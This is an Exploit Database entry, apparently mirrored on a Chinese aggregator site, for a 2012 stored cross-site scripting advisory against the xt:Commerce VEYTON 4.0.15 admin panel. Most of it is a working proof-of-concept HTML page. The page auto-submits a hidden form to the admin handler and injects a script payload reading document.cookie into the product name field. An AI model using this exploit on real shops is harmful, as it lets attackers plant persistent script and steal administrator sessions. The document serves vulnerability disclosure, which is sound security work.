xt:Commerce VEYTON 4.0.15 – ‘products_name_de’ Script Insertion

• Exploit Database
• 34 阅读

• 作者： LiquidWorm
  日期： 2012-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20863/

• <!DOCTYPE html>
  <!--
  
  xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability
  
  
  Vendor: xt:Commerce GmbH / xt:Commerce International Ltd.
  Product web page: http://www.xt-commerce.com
  Affected version: VEYTON 4.0.15 Professional/Merchant/Ultimate
  
  Summary: One shop system, many shop solutions. The shop software
  xt:Commerce 4 is the basic framework for online shops and for
  merchants who install and configure their own shop.
  
  Desc: xt:Commerce suffers from a stored XSS vulnerability when
  parsing user input to the 'products_name_de' parameter via POST
  method thru '/xtAdmin/adminHandler.php' script. Attackers can
  exploit this weakness to execute arbitrary HTML and script code
  in a user's browser session.
  
  Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
   Apache 2.4.2 (Win32)
   PHP 5.4.4
   MySQL 5.5.25a
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2012-5102
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5102.php
  
  
  19.08.2012
  
  -->
  
  
  <html>
  <head>
  <title>xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability</title>
  </head>
  <body>
  <form name="XSS" method="POST" action="http://localhost/xtAdmin/adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true">
  <input type="hidden" name="date_available" value="2012-08-28 12:00:00" />
  <input type="hidden" name="flag_has_specials" value="0" />
  <input type="hidden" name="google_product_cat" value="New" />
  <input type="hidden" name="group_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
  <input type="hidden" name="manufacturers_id" value="0" />
  <input type="hidden" name="meta_description_de" value="XSS" />
  <input type="hidden" name="meta_keywords_de" value="ZSL-2012-5102" />
  <input type="hidden" name="meta_title_de" value="Vulnerability" />
  <input type="hidden" name="permission_id" value="1" />
  <input type="hidden" name="price_flag_graduated_1" value="0" />
  <input type="hidden" name="price_flag_graduated_2" value="0" />
  <input type="hidden" name="price_flag_graduated_3" value="0" />
  <input type="hidden" name="price_flag_graduated_all" value="0" />
  <input type="hidden" name="product_list_template" value="" />
  <input type="hidden" name="product_template" value="" />
  <input type="hidden" name="products_average_quantity" value="0" />
  <input type="hidden" name="products_cmc" value="" />
  <input type="hidden" name="products_description_de" value="thricer" />
  <input type="hidden" name="products_ean" value="1" />
  <input type="hidden" name="products_id" value="10" />
  <input type="hidden" name="products_image" value="Bild" />
  <input type="hidden" name="products_keywords_de" value="Zero Science Lab" />
  <input type="hidden" name="products_master_model" value="" />
  <input type="hidden" name="products_model" value="T-3000" />
  <input type="hidden" name="products_model_old" value="T-1000" />
  <input type="hidden" name="products_name_de" value='"><script>alert(document.cookie);</script>' />
  <input type="hidden" name="products_option_list_temp..." value="" />
  <input type="hidden" name="products_option_template" value="" />
  <input type="hidden" name="products_owner" value="1" />
  <input type="hidden" name="products_price" value="0" />
  <input type="hidden" name="products_quantity" value="0.00" />
  <input type="hidden" name="products_shippingtime" value="0" />
  <input type="hidden" name="products_short_descriptio..." value="t00t" />
  <input type="hidden" name="products_sort" value="0" />
  <input type="hidden" name="products_startpage_sort" value="0" />
  <input type="hidden" name="products_tax_class_id" value="0" />
  <input type="hidden" name="products_url_de" value="www.zeroscience.mk" />
  <input type="hidden" name="products_vpe" value="0" />
  <input type="hidden" name="products_vpe_value" value="0.0000" />
  <input type="hidden" name="products_weight" value="0.0000" />
  <input type="hidden" name="shop_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
  <input type="hidden" name="total_downloads" value="0" />
  <input type="hidden" name="url_text_de" value="de/a2" />
  </form>
  <script type="text/javascript">
  document.XSS.submit();
  </script>
  </body>
  </html>